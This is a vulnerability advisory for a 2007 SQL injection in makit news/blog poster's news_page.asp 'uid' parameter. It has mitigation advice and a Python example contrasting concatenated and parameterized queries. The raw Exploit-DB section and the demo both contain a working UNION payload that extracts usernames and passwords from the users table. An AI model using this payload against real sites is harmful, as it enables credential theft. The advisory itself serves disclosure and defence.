Vendor: news/blog poster
By: ajann
CVSS: 7.5 HIGH
Remote SQL Injection
CWE: 89
Product Name: news/blog poster
Affected Version From: Unknown
Affected Version To: v3
Patch Exists: NO
Related CWE: Not available
CPE: Not available
Platforms Tested: Not available
2007

makit news/blog poster <=v3(news_page.asp) Remote SQL Injection Vulnerability

The vulnerability allows an attacker to inject SQL queries into the 'uid' parameter of the 'news_page.asp' page. By manipulating the SQL query, an attacker can potentially extract sensitive information from the database.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize and validate user input before using it in SQL queries. Additionally, implementing parameterized queries or prepared statements can help prevent SQL injection attacks.
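
The mitigation above, shown as an added example in Python with SQLite; it is not code from the vendor or from the advisory. The query shape, the `news` table and all sample rows are constructed assumptions; only the `uid` parameter, the `users`/`uname`/`pword` names and the request value are taken from the page.

```python
import sqlite3
from urllib.parse import unquote

def make_db():
    """Constructed schema: news has 8 columns (the count the page's UNION
    implies); users has the uname/pword columns the page names."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (uid INTEGER, c2, c3, title, body, c6, c7, c8)")
    db.execute("CREATE TABLE users (uname TEXT, pword TEXT)")
    db.execute("INSERT INTO news VALUES (1, 0, 0, 'Hello', 'First post', 0, 0, 0)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-sample-value')")
    return db

# The uid value from the page's example request, URL-decoded.
PAGE_UID = unquote(
    "-1'%20union%20select%200,0,0,uname,pword,0,0,0%20from%20users%20where%20'1=1"
)

def news_page_concat(db, uid):
    """Assumed 'before' shape: uid is pasted into the SQL text, so quotes
    inside it change the structure of the statement."""
    sql = "SELECT * FROM news WHERE uid='" + uid + "'"
    return db.execute(sql).fetchall()

def news_page_bound(db, uid):
    """Mitigation from the page: validate the input, then bind it as a
    parameter so it can only ever be a value, never SQL."""
    if not uid.isascii() or not uid.isdigit():
        return []  # reject anything that is not a plain integer id
    return db.execute("SELECT * FROM news WHERE uid = ?", (int(uid),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", news_page_concat(db, PAGE_UID))
    print("bound:       ", news_page_bound(db, PAGE_UID))
    print("bound, uid=1:", news_page_bound(db, "1"))
```

Validation and binding are independent layers: the bound query stays safe even if the integer check is removed, and the check lets the page reject malformed requests before they reach the database.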

Exploit-DB raw data:

*******************************************************************************
# Title   :  makit news/blog poster <=v3(news_page.asp) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.makit.net
# $$      :  Free

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//news_page.asp?uid=[SQL]

Example:

//news_page.asp?uid=-1'%20union%20select%200,0,0,uname,pword,0,0,0%20from%20users%20where%20'1=1

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-25]